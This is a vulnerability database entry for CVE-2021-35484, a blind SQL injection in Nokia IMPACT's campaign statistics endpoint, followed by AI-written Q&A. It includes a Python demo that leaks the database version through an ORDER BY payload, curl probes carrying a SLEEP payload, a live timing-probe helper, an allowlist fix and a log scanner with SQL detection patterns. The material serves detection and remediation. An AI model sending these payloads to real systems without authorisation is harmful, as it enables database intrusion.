CVE-2021-35484
Status: Received - Intake
Time-Based Blind SQL Injection in Nokia IMPACT Campaign Endpoint

Publication date: 2026-03-03

Last updated on: 2026-03-05

Assigner: MITRE

Description
Nokia IMPACT through 19.11.2.10-20210118042150283 allows an authenticated user to perform a Time-based Boolean Blind SQL Injection attack on the endpoint /ui/rest-proxy/campaign/statistic (for the View Campaign page) via the sortColumn HTTP GET parameter. This allows an attacker to access sensitive data from the database and obtain access to the database user, database name, and database version information.
Meta Information
Published: 2026-03-03
Last Modified: 2026-03-05
Generated: 2026-05-07
AI Q&A: 2026-03-03
EPSS Evaluated: 2026-05-05
Also listed in: NVD, EUVD
Affected Vendors & Products (1 associated CPE)
Vendor: nokia
Product: impact
Version / Range: up to and including 19.11.2.10-20210118042150283
CWE-89: The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
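As an added illustration of CWE-89 in the shape this CVE describes (a sort parameter interpolated into a query), the following Python/sqlite3 snippet is not Nokia's code and does not use the real IMPACT schema; the table campaign_statistic, its rows and the SORTABLE allowlist are constructed for the example. It shows how a sort column spliced into ORDER BY leaks one bit per request through the row order alone (enough to recover the database version character by character, which is the kind of information the description says an attacker obtains), and the allowlist check that fixes it, since ORDER BY column names cannot be passed as bound parameters.

```python
import sqlite3

# Constructed stand-in for a campaign statistics table; not the real IMPACT schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE campaign_statistic (id INTEGER, name TEXT, sent INTEGER, delivered INTEGER);
        INSERT INTO campaign_statistic VALUES
            (1, 'spring', 100, 90), (2, 'summer', 50, 49), (3, 'autumn', 200, 150);
    """)
    return conn


def build_query_vulnerable(sort_column):
    # CWE-89: the request parameter is spliced into the SQL text unchanged.
    return f"SELECT id, name, sent, delivered FROM campaign_statistic ORDER BY {sort_column}"


def run_ids(conn, sql):
    return [row[0] for row in conn.execute(sql)]


def infer_condition(conn, condition_sql):
    """Boolean-blind inference through ORDER BY: when condition_sql is true the rows
    come back in id order, otherwise in `sent` order (the constructed data makes the
    two orders differ). Nothing from the database is displayed, yet one bit leaks per
    request; swapping the column change for a delay function gives the time-based
    variant the CVE describes."""
    payload = f"CASE WHEN ({condition_sql}) THEN id ELSE sent END"
    observed = run_ids(conn, build_query_vulnerable(payload))
    return observed == run_ids(conn, build_query_vulnerable("id"))


def leak_version_prefix(conn, length=3):
    """Recover the first `length` characters of the DB version one comparison at a
    time, the way a blind attacker recovers database user, name and version."""
    alphabet = "0123456789."
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if infer_condition(conn, f"substr(sqlite_version(), {pos}, 1) = '{ch}'"):
                recovered += ch
                break
    return recovered


SORTABLE = {"id", "name", "sent", "delivered"}  # assumed allowlist of UI-sortable columns


def build_query_safe(sort_column, direction="asc"):
    """ORDER BY cannot take a bound parameter (binding the string 'sent' would sort by
    a constant), so the safe pattern is to validate the request value against an
    allowlist and interpolate nothing but the allowlisted names themselves."""
    if sort_column not in SORTABLE:
        raise ValueError(f"unsupported sort column: {sort_column!r}")
    if direction.lower() not in ("asc", "desc"):
        raise ValueError(f"unsupported sort direction: {direction!r}")
    return (f"SELECT id, name, sent, delivered FROM campaign_statistic "
            f"ORDER BY {sort_column} {direction.upper()}")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable builder, version prefix leaked:", leak_version_prefix(db))
    try:
        build_query_safe("CASE WHEN (1=1) THEN id ELSE sent END")
    except ValueError as exc:
        print("hardened builder rejects payload:", exc)
```

The allowlist is the whole fix: the request value is never placed in the SQL, only a name chosen from a fixed set is, so no quoting or keyword filtering is needed and none can be bypassed.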
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2021-35484 is a vulnerability in Nokia IMPACT versions through 19.11.2.10-20210118042150283 that allows an authenticated user to perform a time-based Boolean blind SQL injection attack.

This attack targets the endpoint /ui/rest-proxy/campaign/statistic via the sortColumn HTTP GET parameter.

Exploiting this vulnerability enables an attacker to extract sensitive data from the database, including the database user, database name, and database version information.


How can this vulnerability impact me?

This vulnerability can impact you by allowing an authenticated attacker to access sensitive database information.

Such unauthorized access could lead to further exploitation of the database, potentially compromising confidential data and the integrity of the system.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

The vulnerability CVE-2021-35484 is a time-based Boolean blind SQL injection in Nokia IMPACT via the sortColumn HTTP GET parameter on the /ui/rest-proxy/campaign/statistic endpoint. Detection typically involves sending crafted HTTP GET requests to this endpoint with specially designed sortColumn values and observing whether the response is delayed, which indicates that the injected SQL was executed.

Specific detection commands or scripts are not provided in the available resources. A common approach is to use a tool such as curl or Burp Suite to send an authenticated request whose sortColumn value appends an SQL time-delay function, and to compare its response time with a baseline request that carries a harmless value. Conceptual curl commands follow. The payload uses MySQL/MariaDB syntax because the page does not state which database IMPACT uses; PostgreSQL would need pg_sleep(5), SQL Server WAITFOR DELAY '0:0:5' and Oracle DBMS_LOCK.SLEEP(5). The -u option assumes HTTP basic authentication; a session cookie would be passed with -b instead.

    # baseline: harmless value, note the reported time_total
    curl -s -o /dev/null -w 'HTTP %{http_code} in %{time_total}s\n' \
      -u '<username>:<password>' -G --data-urlencode 'sortColumn=1' \
      'http://<target>/ui/rest-proxy/campaign/statistic'

    # probe: same request with a 5-second delay payload, URL-encoded by curl
    curl -s -o /dev/null -w 'HTTP %{http_code} in %{time_total}s\n' \
      -u '<username>:<password>' -G \
      --data-urlencode "sortColumn=1' AND IF(SLEEP(5),1,0)-- " \
      'http://<target>/ui/rest-proxy/campaign/statistic'

If the probe consistently takes about five seconds longer than the baseline across several repetitions, the vulnerability is very likely present; a single slow response can be network latency. Because sortColumn selects a sort order, the value may be interpolated unquoted into an ORDER BY clause, in which case the leading quote in the payload has to be dropped for the injected SQL to parse. [2]


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps for CVE-2021-35484 start with limiting who can reach the affected endpoint /ui/rest-proxy/campaign/statistic. Exploitation requires an authenticated account, so restrict the View Campaign function to the smallest set of users who need it, remove or lock stale accounts and enforce strong authentication, since any compromised or malicious account can exploit the flaw.

Applying any available patch or update from Nokia for IMPACT versions through 19.11.2.10-20210118042150283 is the only complete fix for the SQL injection flaw.

If a patch is not immediately available, Web Application Firewall (WAF) rules that reject sortColumn values containing anything other than an expected column name reduce exposure; prefer such an allowlist over blocklisting SQL keywords, which URL encoding and case tricks can evade, and treat the rule as a stopgap rather than a fix.

Monitoring and logging access to the vulnerable endpoint, in particular sortColumn values containing quotes, SQL keywords or time-delay functions, and requests that take several seconds longer than normal, helps detect exploitation attempts early.
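As an added example that is not part of the page or of Nokia's product, the following Python script covers both the detection answer above and the monitoring step in the mitigation answer: scan_log() reads web-server access logs and flags requests to the affected endpoint whose sortColumn value carries an SQL time-delay function or SQL syntax (decoding twice so a double-URL-encoded payload is not missed), and timing_probe() implements the baseline-versus-delayed comparison behind the curl test as a function whose HTTP layer is injectable. Assumptions: the SAMPLE_LOG lines are constructed and follow the combined log format with a trailing response-time field in seconds (Apache %T or nginx $request_time); the delay payload uses MySQL syntax as in the Q&A above; http_fetch() assumes a cookie-based session, which the page does not describe; the 3-second "slow" threshold and 0.8 ratio are arbitrary tuning values.

```python
import re
import statistics
import time
import urllib.request
from urllib.parse import parse_qs, unquote, urlencode, urlsplit

ENDPOINT = "/ui/rest-proxy/campaign/statistic"
PARAM = "sortColumn"

# Time-delay primitives of common DBMS; the page does not say which backend IMPACT uses.
DELAY_RE = re.compile(
    r"\b(sleep|benchmark|pg_sleep|waitfor|dbms_lock\.sleep|dbms_pipe\.receive_message)\b", re.I)
# Characters and keywords that never belong in a column name.
META_RE = re.compile(r'''['"`;()]|--|/\*|\b(and|or|case|when|select|union|if)\b''', re.I)

# Assumed log shape: combined format plus a trailing response time in seconds.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ (?P<rt>[\d.]+)$')

# Constructed sample lines: a benign request, a MySQL-style SLEEP probe, a double-encoded
# pg_sleep probe, an ORDER BY CASE probe and a SLEEP string on an unrelated endpoint.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Mar/2026:10:00:01 +0000] "GET /ui/rest-proxy/campaign/statistic?sortColumn=campaignName&page=1 HTTP/1.1" 200 812 0.041',
    '10.0.0.9 - - [03/Mar/2026:10:00:07 +0000] "GET /ui/rest-proxy/campaign/statistic?sortColumn=1\'%20AND%20IF(SLEEP(5),1,0)--%20 HTTP/1.1" 200 812 5.118',
    '10.0.0.9 - - [03/Mar/2026:10:00:14 +0000] "GET /ui/rest-proxy/campaign/statistic?sortColumn=1%2527%2520AND%2520pg_sleep(5)%2520-- HTTP/1.1" 500 311 0.052',
    '10.0.0.9 - - [03/Mar/2026:10:00:20 +0000] "GET /ui/rest-proxy/campaign/statistic?sortColumn=(SELECT%20CASE%20WHEN%201=1%20THEN%20id%20END) HTTP/1.1" 200 812 0.044',
    '10.0.0.7 - - [03/Mar/2026:10:00:25 +0000] "GET /ui/login?next=SLEEP(5) HTTP/1.1" 200 120 0.010',
]


def extract_sort_column(target):
    """Decoded sortColumn value if `target` hits the affected endpoint, else None."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if not values:
        return None
    # parse_qs decoded once; decode again so a double-encoded payload cannot hide.
    return unquote(values[0])


def classify(value):
    if DELAY_RE.search(value):
        return "time-delay"
    if META_RE.search(value):
        return "sql-syntax"
    return "benign"


def scan_log(lines, slow_seconds=3.0):
    """Flag sortColumn values that look like SQL, and benign-looking ones that were slow."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = extract_sort_column(m["target"])
        if value is None:
            continue
        verdict, rt = classify(value), float(m["rt"])
        if verdict == "benign":
            if rt < slow_seconds:
                continue
            verdict = "slow-response"
        findings.append({"ip": m["ip"], "ts": m["ts"], "sortColumn": value,
                         "verdict": verdict, "rt": rt})
    return findings


def timing_probe(fetch, delay_seconds=5.0, trials=3):
    """Active check. fetch(value) issues one GET with sortColumn=value. Medians of several
    trials are compared so one slow response from network jitter is not taken as proof."""
    def elapsed(value):
        start = time.monotonic()
        fetch(value)
        return time.monotonic() - start
    baseline = [elapsed("id") for _ in range(trials)]
    payload = f"1' AND IF(SLEEP({delay_seconds}),1,0)-- "  # MySQL syntax, as in the Q&A
    delayed = [elapsed(payload) for _ in range(trials)]
    delta = statistics.median(delayed) - statistics.median(baseline)
    return delta, delta >= 0.8 * delay_seconds


def http_fetch(base_url, cookie, timeout=30):
    """fetch() for a live host; assumes a cookie-based session (not described on the page)."""
    def fetch(value):
        url = base_url.rstrip("/") + ENDPOINT + "?" + urlencode({PARAM: value})
        request = urllib.request.Request(url, headers={"Cookie": cookie})
        try:
            urllib.request.urlopen(request, timeout=timeout).read()
        except OSError:
            pass  # a delayed request may time out; the elapsed time is the signal
    return fetch


def simulated_fetch(delay_seconds):
    """Offline stand-in for http_fetch: sleeps only when the value carries SLEEP()."""
    return lambda value: time.sleep(delay_seconds) if "SLEEP(" in value else None
```

Against the constructed log, scan_log() reports the two delay probes and the CASE probe and ignores both the benign request and the SLEEP string on the login endpoint. For a live check, pass http_fetch("https://<target>", "JSESSIONID=...") to timing_probe(); only values in the patterns above are ever placed in the request, and nothing is read back from the database.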

